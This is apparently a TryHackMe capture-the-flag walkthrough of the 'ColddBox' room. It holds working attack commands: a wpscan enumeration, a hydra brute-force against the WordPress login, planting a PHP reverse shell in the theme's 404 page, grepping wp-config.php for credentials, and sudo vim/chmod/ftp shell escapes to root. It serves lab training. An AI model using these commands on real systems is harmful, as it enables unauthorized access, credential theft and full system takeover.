ColddBox— TryHackMe Walkthrough

ColddBox

Hello! Today I am solving ‘ColddBox’ on TryHackMe.

This is an easy-rated box which can be exploited by brute forcing the Wordpress CMS

Room Link: https://tryhackme.com/r/room/colddboxeasy

TryHackMe

Lets get started!

I’ll start off by adding the target IP address to /etc/hosts file.

Step 0: Reconnaissance

To enumerate the host for open ports I’ll use Nmap(Network Mapper).

We get 2 open ports, lets enumerate those further

Brief

1. 80/tcp — HTTP — running an Apache 2.4.18 web server with Wordpress CMS.
2. 4512/tcp — SSH — used to remotely access the system.

Step 1: Web Exploitation

Lets fire up the browser and check the website for any clues.

Seems like a normal website, nothing fishy in the source code too.

Since its running Wordpress, we can use wpscan to enumerate the website for crucial information like usernames, vulnerabilities etc. which can be used to exploit

Homepage

wpscan --url http://coldd.thm -e vp,vt,u -o logs/wpscan -f cli-no-colour

The above command will enumerate the CMS for vulnerable plugins(vp), vulnerable themes(vt), usernames(u)

Identified 4 users, but we’ll omit the first one since wordpress doesn’t allow spaces in username(P.S. its a false positive), lets put them in a list and bruteforce using hydra

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt coldd.thm -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -F

I’m using -F switch to stop hydra once a valid pair of credential is found.

Gottem! Now lets login and get access of the CMS.

Now that we have the access of CMS, lets try uploading our malicious php reverse shell.

We’ll do this by going to the theme editor(Appearance > Editor) and updating the 404 page’s code to our reverse shell’s code.

Now update the file.

Step 2: Compromising the system

Now that we have our malicious reverse shell code on the web server, set up a netcat listener and then send a request to the 404 page(send a request to any page that doesn’t exist on the website, ?p=777 in this case)

curl -L http://coldd.thm/?p=777

And we get a shell!

But first, lets stabilise it.

python3 -c 'import pty; pty.spawn("/bin/bash")'; export TERM=xterm

<CTRL + Z>

stty raw -echo; fg

Lets grab the user flag.

Gotta do a horizontal privilege escalation to c0ldd

Lets go back to the applications directory and search for credentials inside config files.

Easy catch!

cat wp-config.php | grep pass -A 5 -B 5

Lets switch the user and grab the first flag.

One down! Lets grab the other one.

Step 3: Privilege Escalation

Lets vertically escalate our privileges now.

Right off the bat we’ll check for the commands that can be executed by the current user as root using sudo -l command.

3 commands, 3 paths to become root. Lets explore each one-by-one.

Vim

sudo vim -c ':!/bin/bash'

chmod

sudo chmod 6777 /bin/bash
/bin/bash -p

ftp

sudo ftp
!/bin/bash

Conclusion

ColddBox is an easy rated room which can be rooted by brute forcing the weak credentials used for wordpress CMS.

References

1. https://linuxconfig.org/test-wordpress-logins-with-hydra-on-kali-linux
2. https://www.hackingarticles.in/wordpress-reverse-shell/